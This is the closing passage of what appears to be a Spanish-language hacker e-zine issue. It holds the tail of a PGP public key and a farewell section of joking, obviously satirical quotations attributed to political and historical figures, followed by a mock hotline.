Cz5xZwxv6wHZjze7z7Mjydru2zBBen2fBFT/6l4sFAgq8F9M5o849JR8lsWrzqW4
O75fjKQ6gk7It/T11saiHgig9sgASUhS7/YXSXbcfLVDBxCSv5fznnCAl1wcDKMK
x+G8OitXKD3vCD+nPwWqMaUYMb+CyifzMk+BGDpud9TAUTwsIf/PmuUKHkPfYjBe
NOhBnJMRKlQedHx/R4fa0lCQOpacdA0e0PubyZKg/y+LNZ53fHnuGf59CO7dP7PX
xrxsDuMbS6wyrZk1XCylUI8uaR0t72udjOWDzP6dN/OSiGpPTdZLRa6iRN+tXwcT
uK+zsBb6CQ2aGdL6KCcmE0JjGC0p/frWze/5gEUf64YF+M7SRcyJAEYEGBECAAYF
AjYHhEIACgkQ+2GK9zeXB8EmwwCfdqKk2W5iwm1jG6ICF75WRwencOoAn0BEYgEs
WT2KqINEIKul1WKXCwr6
=yQRv
-----END PGP PUBLIC KEY BLOCK-----
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=( DESPEDIDA??? )=-
>> p0r 4zU/|\l0rd Y Cy70r4x <<
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
NoTa: Solo apto para mentes rapidas, y claro con un poco de picardia
mexicana.
"No subira el dolar, ni el pan ni la tortilla...."
CSG antes de ocupar la presidencia
"Espionaje????, nosotros???"
El FBI despues del caso Casa Blanca
"Ya veras la transada que les doy a los gringos en esta
operacion de compraventa..............."
Santa Anna
"Esos nacos gritones no me causan ni un dolor de
cabeza"
Maria Antonieta, Reina de Francia
"No me volvere dictador aunque en ello me fuera
la vida.............."
Fidel Castro, Toma de Moncada
" Traidor yo ?, !Anda a chingar a la mas vieja de tu casa"
Judas
Esperamos que les halla gustado si tienen alguna duda o sugerencia favor de
comunicarlos a los telefonos 01-800-RareGaZz-HoTLiNe, nos vemos la proxima.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=